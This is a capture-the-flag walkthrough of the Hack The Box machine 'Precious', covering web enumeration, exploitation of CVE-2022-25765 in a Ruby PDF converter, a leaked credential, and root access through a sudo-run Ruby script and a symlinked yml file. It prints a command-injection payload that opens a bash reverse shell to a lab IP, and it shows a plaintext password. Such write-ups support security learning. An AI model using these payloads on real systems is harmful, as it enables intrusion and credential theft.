Engagement flow
Summary
This machine starts off with some basic web enumeration. The user learns about a web page pdf conversion application. Some research reveals that this application is written in Ruby and has known CVE's for our version. Exploiting the web application provides our initial foothold as a user to the host via reverse shell.
From here we locate credentials in the users folder which allow for horizontal movement and access as a privileged user. For the root phase of this engagement, we learn about a "Sudo run as permission", that leads to a vulnerability from misconfigured permissions in a custom workflow that calls a .yml file as root. We are able to create a malicious .yml file to execute code under the automated workflow executing as root.
Tools used
Whatweb
linpeas
Processes/Techniques
Web enumeration
Command injection
Insecure file hijacking
sudo run as permission abuse
.yml file creation
Enumeration
We have a narrow attack surface as only 2 ports are open. Typically Port 22 for SSH is reserved for our connections back into the machine within the Hack the Box context. Port 80 however is likely where we will achieve our initial foothold through a CVE or misconfiguration of some sort.
Running a more in depth nmap scan reveals that port 80 is running
nginx 1.18.0 with a http-title: "Convert Web Page to PDF". 
Taking our web enumeration further, we utilize the tool whatweb to gather further information of our web service. We learn that Ruby-on-Rails is in use for the development of this web application. We also see that X-Powered-By[Phusion Passenger]. Researching this reveals it is a web application framework with support for Python, Node JS and Ruby on Rails. It is designed to integrate into Nginx or Apache.
Precious.HTB web application stack
NGINX Server - Web Server
Phusion Passenger - Web Application Server
Ruby on Rails - Web Application Framework
Convert Web Page to PDF - Web application Purpose
Browsing to the website we are presented with a very basic application. Some research however, suggests we have a Ruby PDF kit with known CVE's.
CVE 2022-25765
Reverse shell for initial foothold
Initially I tried the POC provided in the article above, linked back to synk io. I was unsure if the default POC was actually working or not, but it certainly was not obvious if was not working.
Default POC payload
http://example.com/?name=#{'%20`sleep 5`'}Modified Payload
This difference here being the insertion of a reverse shell, but the addition of double quotes to allow for the initial call to the terminal.
http://example.com/?name=#{'%20`bash -c "bash -i >& /dev/tcp/10.10.15.64/6363 0>&1"`'}We can see a successful connection in the below screenshot.
User Phase
In this phase we start looking for anything out of the ordinary. We attempted to leverage linpeas which resulted in making no progress. Some manual investigation, and a hint later I found the .bundle hidden directory in the ruby folder. This is a folder not normally seen in linux, and the deviation of such a file had not originally crossed my mind without asking for help. Drilling down into the folder, we find credentials in the config folder and these allow for a successful SSH connection.
henry:Q3c1AqGHtoI0aXAYFH
With these credentials we are able to obtain a successful shell as user Henry on the target system.
Root
For the Root phase we noticed that there is a run as permission set in place. The run as permission is attached to the /opt/update_dependencies.rb file.
We see that dependencies.yml is in use. Below is our optionional workflows. We can do this manually, or simply create a symbolic link.
Henry can run /opt/update_dependencies.rb
update_dependencies calls file.read looking for dependencies.yml
Confirm path hijacking
Craft malicious dependencies.yml
Call malicious dependencies.yml with sudo
OR
The way which seemed more likely and exploitable. This will then output the string in the root flag as a standered error.
Set a symbolic link to the flag via pointer attached to dependencies.yml
/opt/update_dependencies.rb ---> dependencies.yml --> /root/root.txt
Sudo call
